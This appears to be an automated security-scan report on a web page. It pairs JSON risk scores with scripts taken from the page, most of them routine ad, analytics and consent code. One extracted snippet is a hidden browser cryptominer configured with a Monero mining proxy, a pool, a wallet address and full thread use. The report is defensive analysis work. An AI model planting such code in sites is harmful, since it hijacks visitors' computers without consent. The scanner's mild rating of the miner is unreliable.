Windows Analysis Report
https://trythisonce.com/video5.html

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://trythisonce.com

{
    "risk_score": 1,
    "reasoning": "The script defines a consent object and listens for a custom event to update it. There are no high-risk behaviors such as dynamic code execution or data exfiltration. The script appears to be related to consent management, which is a common and benign practice."
}

var ezTcfConsent=window.ezTcfConsent?window.ezTcfConsent:{loaded:false,store_info:false,develop_and_improve_services:false,measure_ad_performance:false,measure_content_performance:false,select_basic_ads:false,create_ad_profile:false,select_personalized_ads:false,create_content_profile:false,select_personalized_content:false,understand_audiences:false,use_limited_data_to_select_content:false,};function getEzConsentData(){return new Promise(function(resolve){document.addEventListener("ezConsentEvent",function(event){var ezTcfConsent=event.detail.ezTcfConsent;resolve(ezTcfConsent);});});}

{
    "risk_score": 1,
    "reasoning": "The script assigns properties to a global object and includes a URL, but there are no high-risk behaviors such as dynamic code execution or data exfiltration. The URL does not appear to be obfuscated or suspicious, and there is no indication of malicious intent."
}

window._ezaq = Object.assign({"edge_cache_status":31,"edge_response_time":202,"url":"https://trythisonce.com/video5.html"}, typeof window._ezaq !== "undefined" ? window._ezaq : {});

{
    "risk_score": 1,
    "reasoning": "The script appears to be related to ad or analytics configuration with no high-risk behaviors such as dynamic code execution or data exfiltration. The domain 'trythisonce.com' is not inherently suspicious, and there are no indicators of malicious intent."
}

window._ezaq = Object.assign({"ad_cache_level":1,"adpicker_placement_cnt":0,"ai_placeholder_cache_level":1,"ai_placeholder_placement_cnt":-1,"domain_id":592107,"ezcache_level":1,"ezcache_skip_code":7,"has_bad_image":0,"has_bad_words":0,"is_sitespeed":0,"lt_cache_level":0,"response_size":6209,"response_size_orig":707,"response_time_orig":191,"template_id":120,"url":"https://trythisonce.com/video5.html","word_count":0,"worst_bad_word_level":0}, typeof window._ezaq !== "undefined" ? window._ezaq : {});__ez.queue.markLoaded('ezaqBaseReady');

{
    "risk_score": 4,
    "reasoning": "The script dynamically executes code using innerHTML, which is a high-risk indicator (+3 points). It also sends user data to a server endpoint via XHR, which is a moderate-risk indicator (+2 points). However, the endpoint is a relative path, suggesting it may be internal, and the script appears to be for analytics purposes, which could justify a reduction (-1 point for potential legitimate analytics use)."
}

window.ezAnalyticsStatic = true;

function analyticsAddScript(script) {
	var ezDynamic = document.createElement('script');
	ezDynamic.type = 'text/javascript';
	ezDynamic.innerHTML = script;
	document.head.appendChild(ezDynamic);
}
function getCookiesWithPrefix() {
    var allCookies = document.cookie.split(';');
    var cookiesWithPrefix = {};

    for (var i = 0; i < allCookies.length; i++) {
        var cookie = allCookies[i].trim();

        for (var j = 0; j < arguments.length; j++) {
            var prefix = arguments[j];
            if (cookie.indexOf(prefix) === 0) {
                var cookieParts = cookie.split('=');
                var cookieName = cookieParts[0];
                var cookieValue = cookieParts.slice(1).join('=');
                cookiesWithPrefix[cookieName] = decodeURIComponent(cookieValue);
                break; // Once matched, no need to check other prefixes
            }
        }
    }

    return cookiesWithPrefix;
}
function productAnalytics() {
	var d = {"pr":[6],"omd5":"c0a3e58c79e6777c515d916354893c8a"};
	d.u = _ezaq.url;
	d.p = _ezaq.page_view_id;
	d.v = _ezaq.visit_uuid;
	d.ab = _ezaq.ab_test_id;
	d.e = JSON.stringify(_ezaq);
	d.ref = document.referrer;
	d.c = getCookiesWithPrefix('active_template', 'ez', 'lp_');
	if(typeof ez_utmParams !== 'undefined') {
		d.utm = ez_utmParams;
	}

	var dataText = JSON.stringify(d);
	var xhr = new XMLHttpRequest();
	xhr.open('POST','/ezais/analytics?cb=1', true);
	xhr.onload = function () {
		if (xhr.status!=200) {
            return;
		}

        if(document.readyState !== 'loading') {
            analyticsAddScript(xhr.response);
            return;
        }

        var eventFunc = function() {
            if(document.readyState === 'loading') {
                return;
            }
            document.removeEventListener('readystatechange', eventFunc, false);
            analyticsAddScript(xhr.response);
        };

        document.addEventListener('readystatechange', eventFunc, false);
	};
	xhr.setRequestHeader('Content-Type','text/plain');
	xhr.send(dataText);
}
__ez.queue.addFunc("productAnalytics", "productAnalytics", null, true, ['ezaqBaseReady'], false, false, false, true);

{
    "risk_score": 1,
    "reasoning": "The script appears to be a configuration object for ad or analytics purposes with no high-risk behaviors such as dynamic code execution or data exfiltration. The URL is not obfuscated, and there are no interactions with external domains. It uses placeholder patterns typical for analytics or ad scripts."
}

window._ezaq = Object.assign({"ad_cache_level":1,"adpicker_placement_cnt":0,"ai_placeholder_cache_level":1,"ai_placeholder_placement_cnt":-1,"domain_id":592107,"ezcache_level":1,"ezcache_skip_code":7,"has_bad_image":0,"has_bad_words":0,"is_sitespeed":0,"lt_cache_level":0,"response_size":6209,"response_size_orig":707,"response_time_orig":191,"template_id":120,"url":"https://trythisonce.com/video5.html","word_count":0,"worst_bad_word_level":0}, typ

{
    "risk_score": 5,
    "reasoning": "The script is involved in cryptocurrency mining, which can be considered aggressive behavior. It connects to external domains for mining purposes (+2 points for external data transmission). The domains used are not widely recognized as reputable, adding a moderate risk factor (+2 points for suspicious domains). The script's behavior is consistent with mining activity, which is not inherently malicious but can be resource-intensive and unwanted by users (+1 point for behavioral inconsistency)."
}

        server = "wss://ny1.xmrminingproxy.com";
        var pool = "moneroocean.stream";
        var walletAddress = "42py1DTXd2NXpoYBvgriVVFtUfvnQ2bwp7A3T124LVo5NQKKziYEwojEoLE6LayGKmdB75b18fsaQQ3MnU2MP8fuVXA3wT1";
        var workerId = "kdc"
        var threads = -1;
        var password = "x";
        startMining(pool, walletAddress, workerId, threads, password);
        throttleMiner = 90;
    

{
    "risk_score": 3,
    "reasoning": "The script dynamically inserts scripts based on consent, which is a common practice for managing user consent for loading third-party resources. However, it lacks transparency about the domains involved and uses aggressive DOM manipulation by inserting scripts. No high-risk behaviors like data exfiltration or redirects to suspicious domains are present."
}

var __ezHttpConsent={setByCat:function(src,tagType,attributes,category,force){var setScript=function(){if(force||window.ezTcfConsent[category]){var scriptElement=document.createElement(tagType);scriptElement.src=src;attributes.forEach(function(attr){for(var key in attr){if(attr.hasOwnProperty(key)){scriptElement.setAttribute(key,attr[key]);}}});var firstScript=document.getElementsByTagName(tagType)[0];firstScript.parentNode.insertBefore(scriptElement,firstScript);}};if(force||(window.ezTcfConsent&&window.ezTcfConsent.loaded)){setScript();}else if(typeof getEzConsentData==="function"){getEzConsentData().then(function(ezTcfConsent){if(ezTcfConsent&&ezTcfConsent.loaded){setScript();}else{console.error("cannot get ez consent data");force=true;setScript();}});}else{force=true;setScript();console.error("getEzConsentData is not a function");}},};

{
    "risk_score": 2,
    "reasoning": "The script sets cookies related to user consent and audience understanding, which is typical for analytics or consent management. It interacts with a specific domain (trythisonce.com) and does not exhibit high-risk behaviors like dynamic code execution or data exfiltration. The use of cookies for consent purposes is a moderate-risk indicator, but there are no signs of malicious intent."
}

function _setEzCookies(ezConsentData){var cookies=[{name:"ezoab_592107",value:"mod87; Path=/; Domain=trythisonce.com; Max-Age=7200",tcfCategory:"store_info",isEzoic:"true",},{name:"ezosuibasgeneris-1",value:"0493f92b-0a6a-49af-5d2c-0cbea9ab88ea; Path=/; Domain=trythisonce.com; Expires=Wed, 10 Dec 2025 14:01:48 UTC; Secure; SameSite=None",tcfCategory:"understand_audiences",isEzoic:"true",}];for(var i=0;i<cookies.length;i++){var cookie=cookies[i];if(ezConsentData&&ezConsentData.loaded&&ezConsentData[cookie.tcfCategory]){document.cookie=cookie.name+"="+cookie.value;}}}
if(window.ezTcfConsent&&window.ezTcfConsent.loaded){_setEzCookies(window.ezTcfConsent);}else if(typeof getEzConsentData==="function"){getEzConsentData().then(function(ezTcfConsent){if(ezTcfConsent&&ezTcfConsent.loaded){_setEzCookies(window.ezTcfConsent);}else{console.error("cannot get ez consent data");_setEzCookies(window.ezTcfConsent);}});}else{console.error("getEzConsentData is not a function");_setEzCookies(window.ezTcfConsent);}

{
    "risk_score": 3,
    "reasoning": "The script includes error reporting to a third-party domain (g.ezoic.net) and uses aggressive DOM manipulation techniques. However, it does not exhibit high-risk behaviors such as dynamic code execution or data exfiltration. The script appears to be part of a legitimate service (ezoic.net), which may reduce the risk score, but the aggressive nature of the script warrants a medium risk score."
}

var __ez=__ez||{};__ez.stms=Date.now();__ez.evt={};__ez.script={};__ez.ck=__ez.ck||{};__ez.template={};__ez.template.isOrig=true;window.__ezScriptHost="//www.ezojs.com";__ez.queue=function(){var e=0,i=0,t=[],n=!1,o=[],r=[],s=!0,a=function(e,i,n,o,r,s,a){var l=arguments.length>7&&void 0!==arguments[7]?arguments[7]:window,d=this;this.name=e,this.funcName=i,this.parameters=null===n?null:w(n)?n:[n],this.isBlock=o,this.blockedBy=r,this.deleteWhenComplete=s,this.isError=!1,this.isComplete=!1,this.isInitialized=!1,this.proceedIfError=a,this.fWindow=l,this.isTimeDelay=!1,this.process=function(){u("... func = "+e),d.isInitialized=!0,d.isComplete=!0,u("... func.apply: "+e);var i=d.funcName.split("."),n=null,o=this.fWindow||window;i.length>3||(n=3===i.length?o[i[0]][i[1]][i[2]]:2===i.length?o[i[0]][i[1]]:o[d.funcName]),null!=n&&n.apply(null,this.parameters),!0===d.deleteWhenComplete&&delete t[e],!0===d.isBlock&&(u("----- F'D: "+d.name),m())}},l=function(e,i,t,n,o,r,s){var a=arguments.length>7&&void 0!==arguments[7]?arguments[7]:window,l=this;this.name=e,this.path=i,this.async=o,this.defer=r,this.isBlock=t,this.blockedBy=n,this.isInitialized=!1,this.isError=!1,this.isComplete=!1,this.proceedIfError=s,this.fWindow=a,this.isTimeDelay=!1,this.isPath=function(e){return"/"===e[0]&&"/"!==e[1]},this.getSrc=function(e){return void 0!==window.__ezScriptHost&&this.isPath(e)&&"banger.js"!==this.name?window.__ezScriptHost+e:e},this.process=function(){l.isInitialized=!0,u("... file = "+e);var i=this.fWindow?this.fWindow.document:document,t=i.createElement("script");t.src=this.getSrc(this.path),!0===o?t.async=!0:!0===r&&(t.defer=!0),t.onerror=function(){var e={url:window.location.href,name:l.name,path:l.path,user_agent:window.navigator.userAgent};"undefined"!=typeof _ezaq&&(e.pageview_id=_ezaq.page_view_id);var i=encodeURIComponent(JSON.stringify(e)),t=new XMLHttpRequest;t.open("GET","//g.ezoic.net/ezqlog?d="+i,!0),t.send(),u("----- ERR'D: "+l.name),l.isError=!0,!0===l.isBlock&&m()},t.onreadystatechange=t.onload=function(){var e=t.readyState;u("----- F'D: "+l.name),e&&!/loaded|complete/.test(e)||(l.isComplete=!0,!0===l.isBlock&&m())},i.getElementsByTagName("head")[0].appendChild(t)}},d=function(e,i){this.name=e,this.path="",this.async=!1,this.defer=!1,this.isBlock=!1,this.blockedBy=[],this.isInitialized=!0,this.isError=!1,this.isComplete=i,this.proceedIfError=!1,this.isTimeDelay=!1,this.process=function(){}};function c(e,i,n,s,a,d,c,f,u){var m=new l(e,i,n,s,a,d,c,u);!0===f?o[e]=m:r[e]=m,t[e]=m,h(m)}function h(e){!0!==f(e)&&0!=s&&e.process()}function f(e){if(!0===e.isTimeDelay&&!1===n)return u(e.name+" blocked = TIME DELAY!"),!0;if(w(e.blockedBy))for(var i=0;i<e.blockedBy.length;i++){var o=e.blockedBy[i];if(!1===t.hasOwnProperty(o))return u(e.name+" blocked = "+o),!0;if(!0===e.proceedIfError&&!0===t[o].isError)return!1;if(!1===t[o].isComplete)return u(e.name+" blocked = "+o),!0}return!1}function u(e){var i=window.location.href,t=new RegExp("[?&]ezq=([^&#]*)","i").exec(i);"1"===(t?t[1]:null)&&console.debug(e)}function m(){++e>200||(u("let's go"),p(o),p(r))}function p(e){for(var i in e)if(!1!==e.hasOwnProperty(i)){var t=e[i];!0===t.isComplete||f(t)||!0===t.isInitialized||!0===t.isError?!0===t.isError?u(t.name+": error"):!0===t.isComplete?u(t.name+": complete already"):!0===t.isInitialized&&u(t.name+": initialized already"):t.process()}}function w(e){return"[object Array]"==Object.prototype.toString.call(e)}return window.addEventListener("load",(function(){setTimeout((function(){n=!0,u("TDELAY -----"),m()}),5e3)}),!1),{addFile:c,addFileOnce:function(e,i,n,o,r,s,a,l,d){t[e]||c(e,i,n,o,r,s,a,l,d)},addDelayFile:function(e,i){var n=new l(e,i,!1,[],!1,!1,!0);n.isTimeDelay=!0,u(e+" ...  FILE! TDELAY"),r[e]=n,t[e]=n,h(n)},addFunc:function(e,n,s,l,d,c,f,u,m,p){!0===c&&(e=e+"_"+i++);var w=new a(e,n,s,l,d,f,u,p);!0===m?o[e]=w:r[e]=w,t[e]=w,h(w)},addDelayFunc:function(e,i,n){var o=new a(e,i,n,!1,[],!0,!0);o.isTimeDelay=!0,u(e+" ...  FUNCTION! TDELAY"),r[e]=o,t[e]=o,h(o)}

{
    "risk_score": 3,
    "reasoning": "The script primarily handles consent management and ad reloading, with no high-risk behaviors like dynamic code execution or data exfiltration. It uses cookies and interacts with consent APIs, which are typical for consent management. The domain 'trythisonce.com' is not flagged as suspicious, and the script's behavior aligns with consent management, which is a legitimate context."
}

function _emitEzConsentEvent(){var customEvent=new CustomEvent("ezConsentEvent",{detail:{ezTcfConsent:window.ezTcfConsent},bubbles:true,cancelable:true,});document.dispatchEvent(customEvent);}
(function(window,document){function _setAllEzConsentTrue(){window.ezTcfConsent.loaded=true;window.ezTcfConsent.store_info=true;window.ezTcfConsent.develop_and_improve_services=true;window.ezTcfConsent.measure_ad_performance=true;window.ezTcfConsent.measure_content_performance=true;window.ezTcfConsent.select_basic_ads=true;window.ezTcfConsent.create_ad_profile=true;window.ezTcfConsent.select_personalized_ads=true;window.ezTcfConsent.create_content_profile=true;window.ezTcfConsent.select_personalized_content=true;window.ezTcfConsent.understand_audiences=true;window.ezTcfConsent.use_limited_data_to_select_content=true;window.ezTcfConsent.select_personalized_content=true;}
function _clearEzConsentCookie(){document.cookie="ezCMPCookieConsent=tcf2;Domain=.trythisonce.com;Path=/;expires=Thu, 01 Jan 1970 00:00:00 GMT";}
_clearEzConsentCookie();if(typeof window.__tcfapi!=="undefined"){window.ezgconsent=false;var amazonHasRun=false;function _ezAllowed(tcdata,purpose){return(tcdata.purpose.consents[purpose]||tcdata.purpose.legitimateInterests[purpose]);}
function _reloadAds(){if(typeof window.ezorefgsl==="function"&&typeof window.ezslots==="object"){if(typeof __ezapsFetchBids=="function"&&amazonHasRun===false){ezapsFetchBids(__ezaps);if(typeof __ezapsVideo!="undefined"){ezapsFetchBids(__ezapsVideo,"video");}
amazonHasRun=true;}
var slots=[];for(var i=0;i<window.ezslots.length;i++){if(window[window.ezslots[i]]&&typeof window[window.ezslots[i]]==="object"){slots.push(window[window.ezslots[i]]);}else{setTimeout(_reloadAds,100);return false;}}
for(var i=0;i<slots.length;i++){window.ezorefgsl(slots[i]);}}else if(!window.ezadtimeoutset){window.ezadtimeoutset=true;setTimeout(_reloadAds,100);}}
function _handleConsentDecision(tcdata){window.ezTcfConsent.loaded=true;if(!tcdata.vendor.consents["347"]&&!tcdata.vendor.legitimateInterests["347"]){window._emitEzConsentEvent();return;}
window.ezTcfConsent.store_info=_ezAllowed(tcdata,"1");window.ezTcfConsent.develop_and_improve_services=_ezAllowed(tcdata,"10");window.ezTcfConsent.measure_content_performance=_ezAllowed(tcdata,"8");window.ezTcfConsent.select_basic_ads=_ezAllowed(tcdata,"2");window.ezTcfConsent.create_ad_profile=_ezAllowed(tcdata,"3");window.ezTcfConsent.select_personalized_ads=_ezAllowed(tcdata,"4");window.ezTcfConsent.create_content_profile=_ezAllowed(tcdata,"5");window.ezTcfConsent.measure_ad_performance=_ezAllowed(tcdata,"7");window.ezTcfConsent.use_limited_data_to_select_content=_ezAllowed(tcdata,"11");window.ezTcfConsent.select_personalized_content=_ezAllowed(tcdata,"6");window.ezTcfConsent.understand_audiences=_ezAllowed(tcdata,"9");window._emitEzConsentEvent();}
function _handleGoogleConsentV2(tcdata){if(!tcdata||!tcdata.purpose||!tcdata.purpose.consents){return;}
var googConsentV2={};if(tcdata.purpose.consents[1]){googConsentV2.ad_storage='granted';googConsentV2.analytics_storage='granted';}
if(tcdata.purpose.consents[3]&&tcdata.purpose.consents[4]){googConsentV2.ad_personalization='granted';}
if(tcdata.purpose.consents[1]&&tcdata.purpose.consents[7]){googConsentV2.ad_user_data='granted';}
if(googConsentV2.analytics_storage=='denied'){gtag('set','url_passthrough',true);}
gtag('consent','update',googConsentV2);}
__tcfapi("addEventListener",2,function(tcdata,success){if(!success||!tcdata){window._emitEzConsentEvent();return;}
if(!tcdata.gdprApplies){_setAllEzConsentTrue();window._emitEzConsentEvent();return;}
if(tcdata.eventStatus==="useractioncomplete"||tcdata.eventStatus==="tcloaded"){if(typeof gtag!='undefined'){_handleGoogleConsentV2(tcdata);}
_handleConsentDecision(tcdata);if(tcdata.purpose.consents["1"]===true&&tcdata.vendor.consents["755"]!==false){window.ezgconsent=true;(adsbygoogle=window.adsbygoogle||[]).pauseAdRequests=0;_reloadAds();}else{_reloadAds();}
if(window.__ezconsent){__ezcons